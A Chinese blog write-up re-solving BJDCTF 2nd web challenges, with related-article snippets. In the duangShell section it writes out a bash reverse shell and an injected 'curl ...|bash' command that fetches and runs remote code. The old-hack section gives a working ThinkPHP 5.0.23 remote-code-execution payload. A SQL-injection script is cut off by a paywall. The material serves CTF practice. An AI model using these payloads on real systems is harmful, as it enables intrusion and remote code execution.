BJDCTF 2nd(WEB复现)

最新推荐文章于 2022-05-07 18:17:09 发布
最新推荐文章于 2022-05-07 18:17:09 发布
阅读量818 收藏
点赞数
分类专栏: 日常刷题 web类 Python 文章标签: web 信息安全 php curl 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ChenZIDu/article/details/105281208
版权

记录一下,以后忘记了还能看看

fake google-飞机票

duangShell

  • .index.php.swp源码泄露

一进去提示我们:how can i give you source code? .swp?!,获取源码后,利用vim再把它改回去就行,直接打开会乱码:vim -r index.php.swp恢复。

在这里插入图片描述

因为exec()无回显,而且没有禁curl。所以可以反弹shell~~

  • 先查看ip地址ifconfig
    在这里插入图片描述
  • 进入/var/www/html写一个txt文件。
    在这里插入图片描述
  • bash -i >& /dev/tcp/ip/port 0>&1ip就是本地ip,端口随便写一个
  • 监听端口1234
  • nc -lvp 1234
  • 再post一个girlfriend的值
  • girl_friend=curl 174.1.145.235/b.txt|bash
    在这里插入图片描述
    在这里插入图片描述
  • 直接cat /flag是不会出来的
  • grep -r "flag{" /etc
    在这里插入图片描述

old-hack

题目题是thinkphp5,拿通用thinkphp5的payload打了下,然后发现版本5.0.23
在这里插入图片描述

然后拿5.0.23打了下,没看到flag,还以为我没打通,结果在最上面。。
在这里插入图片描述

/index.php?s=captcha

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=cat /flag

简单注入

hint.txt有语句提示:select * from users where username='$_POST["username"]' and password='$_POST["password"]';
对sql的注入还不太了解,放一下大师傅的二分注入

import requests
import time

url = "http://523c9df3-1d44-44e8-bcc5-2a8ad35c3ff4.node3.buuoj.cn/"
temp = {}
password = ""
for i in range(1,1000):
    time.sleep(0.06)
最低0.47元/天 解锁文章
ChenZIDu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BJDCTF 2nd pwn Writeup
starssgo的博客
03-23 3121
博客地址 没做完…没出的题复现了补上去… r2t3 整数溢出,还是比较简单的 # -*- coding: utf-8 -* from pwn import * from LibcSearcher import * context.log_level = 'debug' context.arch = 'amd64' elf = ELF('r2t3') p = 0 def pwn(ip,port,de...
BJDCTF-writeup
01-20
本篇文章为个人做题时的部分wp,如有错误,请联系我更正。 目录杂项最简单的misc-y1ngA_Beautiful_Picture小姐姐-y1ngEasyBaBa圣火昭昭-y1ngTARGZ-y1ngReal_EasyBaBa总结 杂项 最简单的misc-y1ng 题目是一个zip包,尝试解压出错,用AZR压缩包修复工具修复后,解压得到一个secret文件,由于没有后缀名,放入010editor查看,发现含有IHDR 可能是缺少文件头,加上png的文件头89504E47后成功打开图片。发现424A44…等一列数字,猜测是十六进制,在线网站解密得到flag。附上网站:十六进制转文本 A_Bea
BJDCTF 2nd WEB
A_dmin的博客
03-24 7440
BJDCTF 2nd WEB emmm,比赛做了几道题,赛后官方给了wp,把没做出来的复现一下,,,, [BJDCTF 2nd]fake google 一个SSTI,发现是jinja2的,直接用payload打就行: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__=='_IterationGuard' %...
2020-BJDCTF
unexpectedthing的博客
03-08 2136
文章目录Mark loves cat考点wp方法1方法2Cookie is so stable考点:Twig模板注入wpThe mystery of ip考点:wpsmarty的模板学习对模板注入的判别EasySearch考点EzPHP考点wp1.主页2. 绕过$_SERVER['QUERY_STRING']3.绕过preg_match常见绕过preg_match的方法4.绕过$_REQUEST的字母匹配$_REQUEST的一些小特性$_REQUEST使用不当绕过WAF漏洞代码$_REQUEST导致的HPP
BJDCTF_ one_gadget
weixin_44864859的博客
04-09 322
考察点:one_gadget 题目给出了 printf 的地址,由此可算得 libc 基址,然后找 one_gadget、计算 libc 中 one_gadget 地址 printf("Give me your one gadget:"); __isoc99_scanf("%ld", &v4); v5 = v4; v4(); v4 是个函数指针,scanf 的时候把 on...
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]...
BJDCTF 2nd–TARGZ
12-21
审题,tar没用,不需要爆破 下载附件得到tar.gz压缩包 查看16进制的时候发现是PK的头,对应的题目的提示tar不好使(就是不tar压缩的) ...发现可以解压但是得到的还是压缩包,继续重复操作… 当时我解了半小时(时间沉dedao...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
Flask Web Development 2nd edition
09-25
Flask web development, second edition, python web development
BJDCTF2020
Nobug_的博客
09-06 624
[BJDCTF2020]藏藏藏 打开题目后发现 直接打开下面的jpg文件 出现一个二维码 扫码得flag{you are the best!} [BJDCTF2020]鸡你太美 可以发现打开压缩包里面有两张gif图片 但是第一个gif图片打不开我们把它拖到010Editor 去查看 我们可以发现 第二个gif图片没有文件头 我们把GIF的文件头补齐 就可以拿到flag 47 49 46 38 添加过文件头之后就可以查看图片 flag{zhi_yin_you_are_beautiful} [BJD
BJDCTF2nd
Amherstieae的博客
05-25 1084
本文写于3.24,只是那个时候还莫得博客,遂现在才发出。 写在前面 大家好呀,这里是β-AS,是一枚真的小菜鸡,希望路过的师傅带带我鸭 这是第二届BJDCTF,作为真弟弟只对crypto和misc感兴趣呀,然后接着是关于这两方面这次比赛我们做出来的题的writeup,希望能对大家有所帮助,也希望路过的大佬带带我(这是关键) 哦对了,七校联盟萌新赛????嗯?????? 出题人出来!线下1V1来不来!! (假的,我打不过你) CRYPTO 。1签到-y1ng QkpEe1czbGMwbWVfVDBfQkpEQ
BJDCTF_2nd PWN复盘
weixin_44145820的博客
03-26 544
目录r2t3one_gadgetydsneedgirlfriend2r2t4 r2t3 在name_check函数中有一个strcpy,看起来是溢出的机会,但是前面判断了长度,这里在汇编下才能发现漏洞 即只要长度超过255就会溢出 Exp: from pwn import * r = remote("node3.buuoj.cn", 29302) elf = ELF("./BJDCTF_2...
【CTF】bjdctf_2020_babystack 1
凉水的博客
01-21 1289
解题思路: 1 先反编译: undefined8 main(void) { undefined local_18 [12]; uint local_c; setvbuf(stdout,(char *)0x0,2,0); setvbuf(stdin,(char *)0x0,1,0); local_c = 0; puts("**********************************"); puts("* Welcome to the BJDCTF! *
buuctf [BJDCTF 2nd]ydsneedgirlfriend2
weixin_45677731的博客
08-13 202
[BJDCTF 2nd]ydsneedgirlfriend2 一道有手就行的堆题 这道题目的实现过程非常简单易懂,最后的脚本也非常简洁,适合我这样的萌新。 64位程序,拖进ida,看几个主要函数 add函数: 注意,如果bss段的0x6020a0这里没有内容的话,程序会先申请一个0x10的chunk,用于存放接下来为用户申请的chunk的地址和print girlfriend name函数的地址,可以看到这个函数用处就是输出内容,同时,这个chunk本身的地址会被放在0x6020a0处 接下来,用户输
BJDCTF2020CRYPTO
ZBDX2113的博客
05-07 1158
这次做一些简单题,巩固一下基础 首先是ctfshow内部赛密码2 全文只给出了ctf和show两个单词,不是什么特殊字符,也不属于特殊解密,类似于这样的,可以想到摩斯密码,它是由-与.组成的,试着用ctf作.,show作-,敲完前四行编码,转换之后为flag,所以挨个敲就好了。 BJDCTF2020签到题 这种题目一般是归纳总结,仅有小写字母与数字组成的密文,我们可以想到MD5,hex,键盘密码等等,这道题使用的是hex编码,直接带入网站就好。 BJDCTF2020编码与调制 这
BJDCTF 2nd--圣火昭昭-y1ng
qq_42016346的博客
03-22 1949
仔细审题,有key那么应该是加密隐写了,还有一个加重的猜字,很容易联想到outguess(猜的英文) 下载附件得到压缩包,照常16进制头尾.分离,无果后再解压 得到张喵喵喵的图片,照常属性.16进制.分离(还有啥好的习惯请师傅赐教呀) 在属性得到 按照题目的提示去掉com得到 gemlove ok直接outguess解密 flag,GET!!(祖安出题人) ...
第二届BJDCTF-MISC
Alita_lxz的博客
03-24 684
题目来源:https://buuoj.cn/challenges 第一题 将压缩包下载下来,解压之后是一个无后缀的文件,放入HxD中,看到是PNG的文件头,少了一部分 让我们加上去 保存,加上后缀.png 打开,会有一张图片,我们翻转一下 是一串16进制字符串424A447B79316E677A756973687561697D,我们将其转换成字符 BJD{y1ngzuishuai} 第二题...
1.BJDCTF(2020第二届)——Crypto加密题
qwsn
04-01 2703
0x01.题目统计 0x02.Crypto复现 第一题:[BJDCTF 2nd]签到-y1ng (1)密文:QkpEe1czbGMwbWVfVDBfQkpEQ1RGfQ== (2)base64解码得到:BJD{W3lc0me_T0_BJDCTF} (3)flag:BJD{W3lc0me_T0_BJDCTF} 第二题:[BJDCTF 2nd]老文盲了 (1)密文:罼雧締眔擴灝淛匶襫黼瀬鎶軄鶛...
re学习笔记(63)BJDCTF3-re-ViQinere|py2
逆向随笔
05-24 530
ViQinere 看输出前的那个加密函数 里面的jiami()函数是这样的 整个加密逻辑就在那一个函数里,,写逆脚本,,,爆破也可 #include <stdio.h> #include <string.h> int bh(char x) { if (x > 96 && x <= 122) return x - 97; else if (x >= 65 && x <= 90)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值